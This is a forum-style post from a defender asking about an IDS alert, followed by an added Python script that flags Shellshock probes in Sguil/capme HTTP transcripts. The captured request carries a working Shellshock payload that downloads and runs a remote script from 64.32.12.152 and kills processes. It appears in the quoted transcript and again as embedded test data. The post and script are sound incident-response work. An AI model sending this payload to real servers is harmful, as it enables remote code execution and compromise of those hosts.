Hi Doug,
First, a gazillion thanks for such awesome work!!!! I am learning a lot from it. Now to the point.
I have received an alert from the same rule as Donato. I have pivoted from Snorby to Sguil and reviewed the payload, the pcap with Wireshark, the Bro transcript, etc.
I am a little concerned about the payload; it looks like my webserver has been used, or someone has tried to use it, to get something from another host, possibly 64.32.12.152.
I have gathered info on both the possible source of this payload and the IP above.
From the capme file, this is the part that I do not like at all:
--------------------
Src IP: 31.184.194.114 (Unknown)
Src Port: 54904
Dst Port: 80
OS Fingerprint:
31.184.194.114:54904 - UNKNOWN [S20:56:1:60:M1460,S,T,N,W7:.:?:?] (up: 911 hrs)
"...SRC: GET /cgi-bin/cgi.cgi HTTP/1.1
SRC: Accept: */*
SRC: Accept-Language: en-us
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget
http://64.32.12.152/gnu-bash-max-race ; lwp-download
http://64.32.12.152/gnu-bash-max-race ; fetch
http://64.32.12.152/gnu-bash-max-race ; curl -O
http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*");'
SRC: Host: 151.224.41.41
SRC: Connection: Close
SRC:
SRC:
DST: HTTP/1.1 404 Not Found
DST: Content-Type: text/html; charset=us-ascii
DST: Server: Microsoft-HTTPAPI/2.0
DST: Date: Fri, 06 Mar 2015 17:17:09 GMT
DST: Connection: close
DST: Content-Length: 315
DST:
DST: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""
http://www.w3.org/TR/html4/strict.dtd">
DST: <HTML><HEAD><TITLE>Not Found</TITLE>
DST: <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
DST: <BODY><h2>Not Found</h2>
DST: <hr><p>HTTP Error 404. The requested resource is not found.</p>
DST: </BODY></HTML>"
--------------------
Any thoughts?
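For anyone who wants to triage this kind of transcript without eyeballing it, here is an added example (not code from the original post, and not part of Security Onion, Sguil or capme). It parses the SRC:/DST: transcript format shown above, re-joining the wrapped header lines, flags any request header whose value begins with a Bash function definition `() { ... };` (the Shellshock, CVE-2014-6271, trigger), lists the download URLs named in the injected command, and reports the server's status line and Server header. It also checks the response side for the `XSUCCESS!` marker that this particular payload prints when its command actually runs. The first embedded transcript is the one from the post with the outer quote marks removed; the second, benign request is constructed for contrast.

```python
"""Flag Shellshock-style probes in a capme/Sguil HTTP transcript (added example)."""
import re
from typing import Dict, List, Optional, Tuple

# Shellshock trigger: the header value *begins* with a Bash function definition
# "() { ... };"; whatever follows the closing "};" is what a vulnerable bash runs.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{.*?\}\s*;")
URL_RE = re.compile(r"https?://[^\s'\";]+")
STATUS_RE = re.compile(r"^HTTP/\d\.\d\s+(\d{3})")
SIDE_RE = re.compile(r"^[^A-Za-z0-9]*(SRC|DST):\s?(.*)$")
HEADER_NAME_RE = re.compile(r"^[A-Za-z0-9-]+$")
# Marker this payload family prints as the response body when the command ran.
SUCCESS_MARKER = "XSUCCESS!"


def parse_transcript(text: str) -> Tuple[List[str], List[str]]:
    """Return (request_lines, response_lines) from a capme transcript.

    A line without a SRC:/DST: prefix is a wrapped continuation of the
    previous line (capme wraps long headers) and is re-joined to it.
    """
    sides: Dict[str, List[str]] = {"SRC": [], "DST": []}
    current: Optional[List[str]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SIDE_RE.match(line)
        if m:
            current = sides[m.group(1)]
            if m.group(2):
                current.append(m.group(2))
        elif current:
            current[-1] += " " + line
    return sides["SRC"], sides["DST"]


def split_headers(lines: List[str]) -> Tuple[str, Dict[str, str]]:
    """First line is the request/status line; 'Name: value' lines are headers.
    Body lines (HTML etc.) do not look like header names and are skipped."""
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and HEADER_NAME_RE.match(name.strip()):
            headers[name.strip()] = value.strip()
    return (lines[0] if lines else ""), headers


def analyze_transcript(text: str) -> Dict[str, object]:
    """Summarise one HTTP exchange: which header carries the Shellshock trigger,
    what it tries to download, and how the server answered."""
    src, dst = parse_transcript(text)
    request_line, req_headers = split_headers(src)
    status_line, resp_headers = split_headers(dst)
    hits = {n: v for n, v in req_headers.items() if SHELLSHOCK_RE.search(v)}
    urls = sorted({u for v in hits.values() for u in URL_RE.findall(v)})
    m = STATUS_RE.match(status_line)
    return {
        "request": request_line,
        "shellshock": bool(hits),
        "headers_hit": sorted(hits),
        "download_urls": urls,
        "response_status": int(m.group(1)) if m else None,
        "server": resp_headers.get("Server"),
        "success_marker_seen": any(SUCCESS_MARKER in line for line in dst),
    }


# Transcript from the post above (outer quote marks removed).
POSTED_TRANSCRIPT = r"""
SRC: GET /cgi-bin/cgi.cgi HTTP/1.1
SRC: Accept: */*
SRC: Accept-Language: en-us
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget
http://64.32.12.152/gnu-bash-max-race ; lwp-download
http://64.32.12.152/gnu-bash-max-race ; fetch
http://64.32.12.152/gnu-bash-max-race ; curl -O
http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*");'
SRC: Host: 151.224.41.41
SRC: Connection: Close
SRC:
DST: HTTP/1.1 404 Not Found
DST: Content-Type: text/html; charset=us-ascii
DST: Server: Microsoft-HTTPAPI/2.0
DST: Date: Fri, 06 Mar 2015 17:17:09 GMT
DST: Connection: close
DST: Content-Length: 315
DST:
DST: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""
http://www.w3.org/TR/html4/strict.dtd">
DST: <HTML><HEAD><TITLE>Not Found</TITLE>
DST: <BODY><h2>Not Found</h2>
DST: <hr><p>HTTP Error 404. The requested resource is not found.</p>
DST: </BODY></HTML>
"""

# Constructed benign exchange against the same server, for contrast.
BENIGN_TRANSCRIPT = """
SRC: GET /index.html HTTP/1.1
SRC: Host: 151.224.41.41
SRC: User-Agent: Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/36.0
SRC: Connection: Close
SRC:
DST: HTTP/1.1 200 OK
DST: Server: Microsoft-HTTPAPI/2.0
DST: Content-Length: 0
DST:
"""

if __name__ == "__main__":
    for name, transcript in (("posted", POSTED_TRANSCRIPT), ("benign", BENIGN_TRANSCRIPT)):
        print(name, analyze_transcript(transcript))
```

The two response-side fields are the ones worth reading first: the payload prints `XSUCCESS!` as the response body when its command runs, so a hit whose DST side is an ordinary 404 page with no marker, as in this transcript, records an attempt rather than a confirmed execution on that server. The `download_urls` field gives you the host to pivot on in Bro's http.log and conn.log, which is the 64.32.12.152 address already noted in the post.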